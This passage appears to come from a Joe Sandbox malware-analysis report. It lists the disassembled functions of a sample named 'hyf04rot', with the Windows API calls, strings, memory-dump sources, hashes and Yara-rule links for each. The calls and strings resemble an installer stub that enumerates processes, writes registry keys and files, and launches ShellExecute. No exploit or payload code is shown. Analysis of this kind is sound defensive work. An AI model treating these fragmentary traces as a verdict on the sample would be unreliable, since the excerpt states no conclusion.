                                                                                                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                                                • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                              • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                              • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                                              • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                                                                                                                                                              Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                              • String ID: @%F$N$open
                                                                                                                                                                                                                                                                                              • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                                              • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                                              • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                                              Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                              • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                                              • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                                              • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                                              • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                              • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                              • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                                              • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                                              Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                              • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                              • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                                              • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                                                                                                                                                                                                                              Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                              • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                              • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                                              • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                                                                                                                                                                                                                              Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
